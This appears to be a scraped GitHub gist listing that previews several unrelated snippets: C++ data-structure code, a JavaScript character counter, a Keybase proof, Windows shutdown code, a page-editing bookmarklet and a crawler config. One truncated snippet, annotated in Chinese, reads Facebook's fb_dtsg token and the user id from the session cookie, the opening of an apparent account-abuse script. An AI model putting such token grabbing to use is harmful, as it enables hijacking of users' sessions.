This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <iostream> | |
#include <vector> | |
#include <cstring> | |
#include <queue> | |
using namespace std; | |
int main(){ | |
vector<int> n; | |
char str[100]; | |
char *pch; | |
priority_queue<int,vector<int>,greater<int> > pq; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <iostream> | |
#include <stdlib.h> | |
#include <stdio.h> | |
#include <algorithm> | |
#include <queue> | |
#include <stack> | |
#include <vector> | |
using namespace std; | |
struct Edge { | |
int value; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function count(value){ | |
nowChr = 0; | |
for(var i=0;i<value.length;i++){ | |
value.charCodeAt(i)<256?nowChr++:nowChr+=2; | |
} | |
console.log(nowChr/2); | |
} | |
count($('body > div.container-body > div > div.col-md-12 > table > tbody > tr:nth-child(3) > td').text()) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
### Keybase proof | |
I hereby claim: | |
* I am s3131212 on github. | |
* I am s3131212 (https://keybase.io/s3131212) on keybase. | |
* I have a public key whose fingerprint is 0903 1B49 6913 3C3E 30AA 7FB7 48E0 A4EF EA1E 253C | |
To claim this, I am signing this object: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* 原始資料來自: | |
* https://gist.github.com/Inndy/8618115 | |
* 而Allen對此檔案做了更詳細的註解 | |
* 請尊重原始作者,還有執行這程式會悲劇,另外如果我有註解錯誤或是程式錯誤,歡迎提出 | |
*/ | |
var fb_dtsg = document.getElementsByName("fb_dtsg")[0].value; | |
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#pragma comment(lib, "advapi32.lib") | |
BOOL ShutdownSystem(LPTSTR lpMsg){ | |
HANDLE hToken; // handle to process token | |
TOKEN_PRIVILEGES tkp; // pointer to token structure | |
BOOL fResult; // system shutdown flag | |
// Get the current process token handle so we can get shutdown |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
javascript:document.body.contentEditable = 'true'; document.designMode='on'; void 0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"db":{ | |
"host":"127.0.0.1", | |
"port":3306, | |
"user":"root", | |
"password":"", | |
"database":"crawler" | |
}, | |
"baseSite":"http://s3131212.com/links/" | |
} |